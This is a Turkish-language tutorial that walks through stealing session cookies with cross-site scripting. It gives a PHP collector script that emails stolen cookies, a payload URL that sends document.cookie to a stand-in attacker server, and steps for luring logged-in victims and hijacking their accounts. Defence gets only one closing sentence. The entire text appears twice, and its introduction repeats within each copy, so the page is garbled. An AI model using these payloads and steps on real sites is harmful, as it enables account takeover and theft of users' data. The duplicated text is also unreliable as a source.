XSS Kullanarak Kurbana Ait Cookie Bilgilerine Erişim
XSS, Cross-Site Scripting, bir web sitesindeki güvenlik açığından yararlanarak kullanıcılara kötü amaçlı kod göndermeyi sağlayan bir saldırı türüdür. XSS saldırısı ile bir kullanıcının cookie bilgisini çalmak, onun oturumunu ele geçirmek veya web sitesinin içeriğini değiştirmek mümkündür.
XSS saldırısı yapmak için aşağıdaki adımları izleyebilirsiniz:
XSS (Siteler Arası Komut Dosyası) saldırısı, bir web sitesine kötü amaçlı kod enjekte etmek ve kullanıcıların tarayıcılarını etkilemek için kullanılan bir siber saldırı yöntemidir. XSS saldırısı ile bir kullanıcının cookie bilgilerini ele geçirmek ve onun oturumunu ele geçirmek mümkündür. Bu işlemi yapmak için aşağıdaki adımları izleyebilirsiniz:
1. Adım: Hedef web sitesinde XSS açığı olan bir yer bulun. Bu genellikle kullanıcı girişi alınan veya dinamik içerik gösterilen sayfalarda olur. XSS açığını test etmek için <script>alert('XSS')</script> gibi basit bir JavaScript kodu deneyebilirsiniz. Eğer bu kod sayfada çalıştırılırsa, XSS açığı olduğunu anlayabilirsiniz. Cookie bilgisini almak için document.cookie fonksiyonunu kullanabilirsiniz. Örneğin, http://testasp.vulnweb.com/Search.asp?tfSearch=<script>alert(document.cookie)</script> URL'sini denerseniz, sayfada cookie değerini gösteren bir uyarı kutusu göreceksiniz.
2. Adım: Cookie değerini kendi sunucunuza veya e-posta adresinize göndermek için bir PHP scripti hazırlayın. Bu script, cookie değerini bir GET parametresi olarak alır ve e-posta ile size iletir. Aşağıda bir örnek script verilmiştir. Bu scripti kendi sunucunuza cookie.php ismiyle kaydedin ve e-posta adresinizi değiştirin.
php
<?php
$cookie = $_GET["cookie"]; // cookie değerini GET parametresinden al
mail("[email protected]", "New cookie found", $cookie); // cookie değerini e-posta ile gönder
?>
3. Adım: XSS açığı olan web sitesine bir link oluşturun. Bu link, cookie değerini alıp scriptinize yönlendiren bir JavaScript kodu içermelidir. Örneğin, http://testasp.vulnweb.com/Search.asp?tfSearch=<script>location.href = 'http://your_server.com/cookie.php?cookie='+document.cookie;</script> gibi bir link oluşturabilirsiniz. Bu linki, hedef web sitesine giriş yapmış olan kurbanlara bir şekilde ulaştırın. Bunu e-posta, sosyal medya veya başka bir yöntemle yapabilirsiniz. Kurbanlar linki tıkladığında, cookie değerleri scriptinize gönderilecektir.
4. Adım: Scriptinizden gelen e-postaları kontrol edin. Her e-posta, bir kurbanın cookie değerini içerecektir. Bu cookie değerleri, kurbanların oturum bilgilerini saklar. Örneğin, ASPSESSIONIDCCCRRCRD=OGMOLPFCCOJHJEEGKOPFAMGD gibi bir cookie değeri görebilirsiniz.
5. Adım: Cookie değerini tarayıcınıza ekleyin ve hedef web sitesine girin. Böylece, kurbanın oturumunu ele geçirmiş olursunuz. Bu işlemi yapmak için Cookie Manager+ gibi bir Firefox eklentisi kullanabilirsiniz. Bu eklenti ile cookie değerini düzenleyebilir veya yeni bir cookie ekleyebilirsiniz. Cookie değerini ekledikten sonra, hedef web sitesini yenileyin. Eğer cookie değeri geçerliyse, kurbanın hesabına giriş yapmış olacaksınız. Bu şekilde, kurbanın hesabındaki verilere erişebilir, onun adına işlem yapabilir veya hesabını ele geçirebilirsiniz.
Bu adımları takip ederek, XSS saldırısı ile bir web sitesindeki kullanıcıların cookie bilgilerini ele geçirebilir ve onların oturumlarını ele geçirebilirsiniz. Bu saldırının başarılı olması için, hedef web sitesinde XSS açığı olması, kurbanların linki tıklaması ve cookie değerinin geçerli olması gerekmektedir. Bu saldırıdan korunmak için, web sitelerinin XSS açıklarını gidermesi, kullanıcıların güvenilir olmayan linklere tıklamaması ve tarayıcılarının güvenlik ayarlarını artırması önerilir.
XSS, Cross-Site Scripting, bir web sitesindeki güvenlik açığından yararlanarak kullanıcılara kötü amaçlı kod göndermeyi sağlayan bir saldırı türüdür. XSS saldırısı ile bir kullanıcının cookie bilgisini çalmak, onun oturumunu ele geçirmek veya web sitesinin içeriğini değiştirmek mümkündür.
XSS saldırısı yapmak için aşağıdaki adımları izleyebilirsiniz:
XSS (Siteler Arası Komut Dosyası) saldırısı, bir web sitesine kötü amaçlı kod enjekte etmek ve kullanıcıların tarayıcılarını etkilemek için kullanılan bir siber saldırı yöntemidir. XSS saldırısı ile bir kullanıcının cookie bilgilerini ele geçirmek ve onun oturumunu ele geçirmek mümkündür. Bu işlemi yapmak için aşağıdaki adımları izleyebilirsiniz:
1. Adım: Hedef web sitesinde XSS açığı olan bir yer bulun. Bu genellikle kullanıcı girişi alınan veya dinamik içerik gösterilen sayfalarda olur. XSS açığını test etmek için <script>alert('XSS')</script> gibi basit bir JavaScript kodu deneyebilirsiniz. Eğer bu kod sayfada çalıştırılırsa, XSS açığı olduğunu anlayabilirsiniz. Cookie bilgisini almak için document.cookie fonksiyonunu kullanabilirsiniz. Örneğin, http://testasp.vulnweb.com/Search.asp?tfSearch=<script>alert(document.cookie)</script> URL'sini denerseniz, sayfada cookie değerini gösteren bir uyarı kutusu göreceksiniz.
2. Adım: Cookie değerini kendi sunucunuza veya e-posta adresinize göndermek için bir PHP scripti hazırlayın. Bu script, cookie değerini bir GET parametresi olarak alır ve e-posta ile size iletir. Aşağıda bir örnek script verilmiştir. Bu scripti kendi sunucunuza cookie.php ismiyle kaydedin ve e-posta adresinizi değiştirin.
php
<?php
$cookie = $_GET["cookie"]; // cookie değerini GET parametresinden al
mail("[email protected]", "New cookie found", $cookie); // cookie değerini e-posta ile gönder
?>
3. Adım: XSS açığı olan web sitesine bir link oluşturun. Bu link, cookie değerini alıp scriptinize yönlendiren bir JavaScript kodu içermelidir. Örneğin, http://testasp.vulnweb.com/Search.asp?tfSearch=<script>location.href = 'http://your_server.com/cookie.php?cookie='+document.cookie;</script> gibi bir link oluşturabilirsiniz. Bu linki, hedef web sitesine giriş yapmış olan kurbanlara bir şekilde ulaştırın. Bunu e-posta, sosyal medya veya başka bir yöntemle yapabilirsiniz. Kurbanlar linki tıkladığında, cookie değerleri scriptinize gönderilecektir.
4. Adım: Scriptinizden gelen e-postaları kontrol edin. Her e-posta, bir kurbanın cookie değerini içerecektir. Bu cookie değerleri, kurbanların oturum bilgilerini saklar. Örneğin, ASPSESSIONIDCCCRRCRD=OGMOLPFCCOJHJEEGKOPFAMGD gibi bir cookie değeri görebilirsiniz.
5. Adım: Cookie değerini tarayıcınıza ekleyin ve hedef web sitesine girin. Böylece, kurbanın oturumunu ele geçirmiş olursunuz. Bu işlemi yapmak için Cookie Manager+ gibi bir Firefox eklentisi kullanabilirsiniz. Bu eklenti ile cookie değerini düzenleyebilir veya yeni bir cookie ekleyebilirsiniz. Cookie değerini ekledikten sonra, hedef web sitesini yenileyin. Eğer cookie değeri geçerliyse, kurbanın hesabına giriş yapmış olacaksınız. Bu şekilde, kurbanın hesabındaki verilere erişebilir, onun adına işlem yapabilir veya hesabını ele geçirebilirsiniz.
Bu adımları takip ederek, XSS saldırısı ile bir web sitesindeki kullanıcıların cookie bilgilerini ele geçirebilir ve onların oturumlarını ele geçirebilirsiniz. Bu saldırının başarılı olması için, hedef web sitesinde XSS açığı olması, kurbanların linki tıklaması ve cookie değerinin geçerli olması gerekmektedir. Bu saldırıdan korunmak için, web sitelerinin XSS açıklarını gidermesi, kullanıcıların güvenilir olmayan linklere tıklamaması ve tarayıcılarının güvenlik ayarlarını artırması önerilir.
